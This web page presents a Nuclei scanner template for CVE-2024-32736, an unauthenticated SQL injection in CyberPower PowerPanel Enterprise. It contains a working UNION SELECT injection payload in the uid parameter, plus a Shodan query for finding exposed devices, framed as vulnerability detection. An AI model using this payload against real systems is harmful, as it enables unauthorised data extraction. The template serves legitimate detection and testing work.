Skip to content

CyberPower < v2.8.3 - SQL Injection

ID: CVE-2024-32736

Severity: high

Author: DhiyaneshDk

Tags: cve,cve2024,cyberpower,sqli

A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .

id: CVE-2024-32736
info:
name: CyberPower < v2.8.3 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .
impact: |
An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32736
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-32736
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,sqli
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--"
matchers-condition: and
matchers:
- type: regex
regex:
- '"code":"([0-9.]+)"'
- type: word
part: body
words:
- '"results":'
- '{"status":"finished'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"code":"([0-9.]+)"'
# digest: 4a0a00473045022100bd67384dba62732f60a50e003fe71d0a19a6528b66b465f0751e4dfeefc9921902206f959a0724a1f4723632ca9bb7d7a03f9ae28cc98870c21c3ea5bcb759a28b3c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32736.yaml"

View on Github